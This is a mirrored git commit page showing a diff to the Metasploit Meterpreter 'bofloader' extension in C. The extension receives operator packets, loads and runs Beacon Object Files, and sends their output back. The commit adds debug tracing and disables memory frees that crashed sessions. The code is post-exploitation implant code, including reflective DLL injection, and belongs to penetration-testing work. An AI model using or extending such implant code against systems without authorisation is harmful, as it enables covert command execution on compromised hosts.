github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-06 01:16:37 +02:00
Code Releases Activity

bofloader nocrash

Browse Source
This commit is contained in:
joe 2022-09-04 19:28:41 -04:00
parent 35f950b4d2
commit 5de520f527
1 changed files with 18 additions and 10 deletions

28
c/meterpreter/source/extensions/bofloader/main.c

@ -7,13 +7,14 @@
#include "common_metapi.h" #include "common_metapi.h"
#include <stdint.h> #include <stdint.h>
#include "main.h" #include "main.h"
#include "stdlib.h"
// Required so that use of the API works. // Required so that use of the API works.
MetApi* met_api = NULL; MetApi* met_api = NULL;
#define DEBUGTRACE 1
#define RDIDLL_NOEXPORT #define RDIDLL_NOEXPORT
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
typedef int (*goCallback)(char *, int); typedef int (*goCallback)(char *, int);
extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback); extern int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback);
extern char * BeaconGetOutputData(int *outsize); extern char * BeaconGetOutputData(int *outsize);
@ -43,6 +44,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
char * output_data = NULL; char * output_data = NULL;
char * args_buffer = NULL; char * args_buffer = NULL;
real_dprintf("[BOFLOADER] Inside request cmd\n");
if (NULL == response) if (NULL == response)
{ {
met_api->packet.destroy(response); met_api->packet.destroy(response);
@ -51,16 +53,19 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
buffer_size = packet->payloadLength; buffer_size = packet->payloadLength;
args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size); args_buffer = (char *) met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_BOFLOADER_CMD_EXEC, &buffer_size);
real_dprintf("[BOFLOADER] got pkt contents\n");
if (args_buffer != NULL) if (args_buffer != NULL)
{ {
real_dprintf("[BOFLOADER] calling load and run\n");
if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL)) if (LoadAndRun(args_buffer, (uint32_t)buffer_size, NULL))
{ {
real_dprintf("[BOFLOADER] load and run failed\n");
result = ERROR_BAD_COMMAND; result = ERROR_BAD_COMMAND;
} }
else else
{ {
real_dprintf("[BOFLOADER] getting out data\n");
output_data = BeaconGetOutputData(&outdata_size); output_data = BeaconGetOutputData(&outdata_size);
} }
@ -68,21 +73,24 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
{ {
met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_CMD_RESULT, output_data); met_api->packet.add_tlv_string(response, TLV_TYPE_BOFLOADER_CMD_RESULT, output_data);
} }
} }
else else
{ {
result = ERROR_INVALID_PARAMETER; result = ERROR_INVALID_PARAMETER;
} }
dprintf("[BOFLOADER] Finished executing, if success will recv output data."); real_dprintf("[BOFLOADER] Finished executing, if success will recv output data.");
met_api->packet.transmit_response(result, remote, response); met_api->packet.transmit_response(result, remote, response);
real_dprintf("[BOFLOADER] response sent");
if (NULL != response) //FIXME -- freeing the memory crashes meterpreter sessions
#if 0
if (response)
met_api->packet.destroy(response); met_api->packet.destroy(response);
if (NULL != packet) if (packet)
met_api->packet.destroy(packet); met_api->packet.destroy(response);
dprintf("[BOFLOADER] Done."); #endif
real_dprintf("[BOFLOADER] Done.");
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -93,11 +101,11 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
* @param remote Pointer to the remote instance. * @param remote Pointer to the remote instance.
* @return Indication of success or failure. * @return Indication of success or failure.
*/ */
DWORD InitServerExtension(MetApi* api, Remote* remote) DWORD InitServerExtension(MetApi* api, Remote* remote)
{ {
met_api = api; met_api = api;
SET_LOGGING_CONTEXT(api) SET_LOGGING_CONTEXT(api)
met_api->command.register_all(customCommands); met_api->command.register_all(customCommands);